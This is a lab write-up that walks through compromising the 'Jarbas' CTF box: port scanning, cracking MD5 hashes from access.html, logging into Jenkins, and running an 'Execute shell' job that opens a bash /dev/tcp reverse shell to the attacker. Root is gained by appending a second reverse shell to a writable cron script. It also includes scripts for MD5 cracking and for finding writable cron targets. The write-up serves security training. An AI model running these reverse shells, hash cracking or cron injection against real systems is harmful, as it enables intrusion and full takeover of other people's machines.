Target environment

Attacker machine: 172.20.10.6 (Kali)

Target machine: 172.20.10.2 (CentOS)

Information gathering

nmap -sn 172.20.10.0/24  # ping sweep of the /24 (class C) range

The newly appearing host IP shows that 172.20.10.2 is the target.

nmap -sT --min-rate 10000 -p- 172.20.10.2  # TCP connect scan of all 65535 ports at 10k packets/s

The open ports are shown above. Next, use nmap's built-in scripts for a quick vulnerability check and service enumeration on those ports.

sudo nmap -sT -O -sC -sV -p22,80,3306,8080 172.20.10.2  # service/version detection, default scripts and OS fingerprinting on the open TCP ports

Starting Nmap 7.92 ( https://nmap.org ) at 2023-09-18 16:42 CST
Nmap scan report for 172.20.10.2
Host is up (0.0026s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA)
| 256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA)
|_ 256 57:72:08:54:b7:56:ff:c3:e6:16:6f:97:cf:ae:7f:76 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Jarbas - O Seu Mordomo Virtual!
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
MAC Address: 5A:61:EE:6E:07:5A (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://

Summary of the per-port and OS findings:

Port 22: OpenSSH 7.4 (host key fingerprints listed above)
Port 80: Apache httpd 2.4.6 with PHP 5.4.16 serving the website
Port 3306: MySQL port, MariaDB (unauthorized: the server refuses connections from our host)
Port 8080: Jetty 9.4, with a robots.txt file
OS: Linux

At the same time, run a directory scan against port 80.

gobuster dir -u 172.20.10.2:80 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

The plain scan finds nothing, so scan specifically for txt, php and html files.

gobuster dir -u 172.20.10.2:80 -x php,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

An access.html file exists.


Initial foothold

Fetch the page.

curl 172.20.10.2:80/access.html

It contains several plaintext usernames with MD5-hashed passwords; from experience these are most likely login credentials for something on the box.

After cracking the hashes:

tiago:italia99
trindade:marianna
eder:vipsu
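The cracking step above can be reproduced offline with an online lookup service or hashcat, but the mechanics are simple enough to show directly. The following bash script is an added example and not part of the original writeup: it hashes a wordlist once with md5sum and matches each "user:hash" line from an access.html-style file against it. The hash values are constructed here by hashing the three cracked passwords the writeup reports (plus one decoy whose password is deliberately missing from the wordlist), so nothing is copied from the target.

```bash
#!/usr/bin/env bash
# Added example, not part of the original writeup: dictionary cracker for
# unsalted MD5 hashes in "user:hash" form, the layout access.html uses.

md5_of() { printf '%s' "$1" | md5sum | cut -d' ' -f1; }

# Constructed stand-in for access.html: the three real users plus one decoy
# whose password is not in the wordlist, to exercise the "not cracked" path.
sample_hashes() {
  printf '%s:%s\n' \
    tiago    "$(md5_of italia99)" \
    trindade "$(md5_of marianna)" \
    eder     "$(md5_of vipsu)" \
    decoy    "$(md5_of correcthorsebatterystaple)"
}

# Constructed mini wordlist; on Kali you would pass rockyou.txt instead.
sample_wordlist() {
  printf '%s\n' password 123456 italia99 admin marianna letmein vipsu jenkins
}

# crack_md5 HASHFILE WORDLIST: prints "user:plaintext" for every input line,
# or "user:<not cracked>" when no wordlist entry hashes to the target.
crack_md5() {
  local hashfile=$1 wordlist=$2 tbl word user h plain
  tbl=$(mktemp)
  # Hash the whole wordlist once ("hash word" per line) instead of once per target.
  while IFS= read -r word; do
    [ -n "$word" ] || continue
    printf '%s %s\n' "$(md5_of "$word")" "$word"
  done < "$wordlist" > "$tbl"
  while IFS=: read -r user h; do
    h=$(printf '%s' "$h" | tr 'A-F' 'a-f')   # md5sum prints lowercase hex
    plain=$(awk -v t="$h" 'index($0, t " ") == 1 { print substr($0, length(t) + 2); exit }' "$tbl")
    printf '%s:%s\n' "$user" "${plain:-<not cracked>}"
  done < "$hashfile"
  rm -f "$tbl"
}

# Usage on Kali:
#   crack_md5 access_hashes.txt /usr/share/wordlists/rockyou.txt
```

Unsalted MD5 is why this works at all: every user with the same password produces the same hash, and a single pass over the wordlist cracks all of them at once.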

Port 8080 serves a Jenkins login page; try the credentials above.


eder:vipsu logs in successfully.


Once in the dashboard, you can either look up known vulnerabilities for this Jenkins version or look for obviously dangerous functionality yourself. The "New Item" page usually exposes the most interactive features, so start by creating a Freestyle software project.


Go through the available options one by one.


After trying for a while, the "Add build step" list at the bottom turns out to include an "Execute shell" step that runs arbitrary system commands. Since nmap fingerprinted the host as Linux, use Execute shell to build a job that spawns a reverse shell:

bash -i >& /dev/tcp/172.20.10.6/8888 0>&1  # reverse shell back to port 8888 on Kali

Note that Jenkins runs an Execute shell step with /bin/sh -xe unless the script begins with a shebang. On CentOS /bin/sh is bash, so the /dev/tcp redirection works as-is; on a Debian-based target, where sh is dash, put #!/bin/bash on the first line or wrap the command in bash -c '...'.

Before saving the job, start a listener on Kali.

nc -lvp 8888

After saving the job, remember to click "Build Now"! The shell comes back.

whoami
id

The shell runs as an unprivileged user, so the next step is privilege escalation.


Privilege escalation

Checking the system crontab entries reveals a job set up by root that runs CleaningScript.sh every 5 minutes.

Because the script file is writable by our user, appending a reverse-shell line to it gets that line executed as root on the next run.
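The enumeration that finds this kind of cron misconfiguration is worth automating. The bash function below is an added example, not code from the writeup: it parses files in the system-crontab layout (min hour dom mon dow user command, as used by /etc/crontab and /etc/cron.d/*), pulls every absolute path out of each job's command, and reports the ones that are regular files writable by the current user. The paths in the usage comment are the ones from this box; the crontab and script in the test are constructed.

```bash
#!/usr/bin/env bash
# Added example (not from the writeup): report cron jobs whose script file the
# current user can write, i.e. the check that turns "root runs
# CleaningScript.sh every 5 minutes" into a privilege-escalation finding.

# find_writable_cron_targets FILE...: FILEs use the system-crontab layout
#   min hour dom mon dow USER COMMAND
# (/etc/crontab and /etc/cron.d/*). Per-user crontabs from `crontab -l` have
# no USER column and are not handled here.
# Output: one "file<TAB>user<TAB>writable-path" line per hit.
find_writable_cron_targets() {
  local f user cmd tok
  for f in "$@"; do
    [ -r "$f" ] || continue
    # Drop blank lines, comments and VAR=value assignments, then emit "user command".
    awk '!/^[[:space:]]*(#|$)/ && !/^[[:space:]]*[[:alnum:]_]+=/ && NF >= 7 {
           printf "%s", $6
           for (i = 7; i <= NF; i++) printf " %s", $i
           printf "\n"
         }' "$f" |
    while read -r user cmd; do
      # Every absolute path in the command is a candidate (interpreter, script, args).
      # Only regular files count: /dev/null is world-writable but useless here.
      for tok in $cmd; do
        case $tok in
          /*)
            if [ -f "$tok" ] && [ -w "$tok" ]; then
              printf '%s\t%s\t%s\n' "$f" "$user" "$tok"
            fi
            ;;
        esac
      done
    done
  done
}

# Usage on the target (paths from this box):
#   find_writable_cron_targets /etc/crontab /etc/cron.d/*
# On Jarbas this prints the root job's /etc/script/CleaningScript.sh.
```

Run it as the unprivileged Jenkins user, not as root: as root every existing file is writable and the output is meaningless. Interpreters such as /bin/bash will show up only if their permissions are broken, which is a finding in its own right.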

echo "bash -i >& /dev/tcp/172.20.10.6/5555 0>&1" >> /etc/script/CleaningScript.sh
cat CleaningScript.sh

The line is written to the script successfully.


With a second listener on port 5555 running on Kali, wait up to 5 minutes for cron to fire; the root shell comes back on its own.
